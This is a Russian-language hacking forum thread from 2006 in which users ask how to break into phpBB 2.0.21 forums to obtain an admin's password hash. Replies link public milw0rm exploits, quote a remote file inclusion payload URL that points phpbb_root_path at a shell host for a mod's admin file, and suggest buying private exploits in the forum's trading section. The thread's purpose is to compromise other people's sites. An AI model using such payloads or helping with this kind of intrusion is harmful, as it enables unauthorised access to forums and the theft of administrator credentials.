Форумы Кто реально вытаскивал хеш админа форума на phpBB2.0.21?

Discussion in 'Уязвимости CMS/форумов' started by oxigen, 25 Oct 2006.

  1. oxigen

    oxigen New Member

    Joined:
    19 Dec 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Сейчас phpBB один из самых стабильных состем форумов.
    Есть ли такие перцы кто всё же ломал последню версию?

    Если не секрет то как? каким экспойтом, или чем-то другим?

    Поделись - интересно.

    Пробывали многие, но у кого получалось?
     
  2. rijy

    rijy Banned

    Joined:
    25 Sep 2006
    Messages:
    394
    Likes Received:
    386
    Reputations:
    175
    multiple PHP application poison NULL byte vulnerability phpBB 2.0.21
    http://milw0rm.com/exploits/2348

    Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
    http://milw0rm.com/exploits/2429

    з.ы. сам пока не пробовал эту версию...
     
  3. Brahma

    Brahma Elder - Старейшина

    Joined:
    14 Jul 2006
    Messages:
    55
    Likes Received:
    13
    Reputations:
    6
    последний сплойт
    Code:
    Exploit :
    #--------------------------------
    #
    #http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
    В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
     
  4. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Неудивительно =)
    Это файл от мода "Admin Topic Action Logging Mod" для phpbb. Сплоит если и будет работать, то только на форуме с этим модом

    Насколько мне известно, такие перцы есть. И тут на ачате тоже. И совсем не секрет, чем они ломали - мозгами и руками. =)
     
    #4 syntacsis, 27 Oct 2006
    Last edited: 27 Oct 2006
  5. oxigen

    oxigen New Member

    Joined:
    19 Dec 2005
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    syntacsis, дай плх их ники. Просто задать пару вопросов, ну или пусть сами отвят каким эксплойтом или снифером. Мне нужно знать чем, а уж как я разберусь.
    Как ни как поиск рулит!
     
  6. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    тут тебе этого не ответят ) ибо приват сплойты :)
    Обратись в Роздел "покупка продажа" и напиши сплойт "для такой-то версии"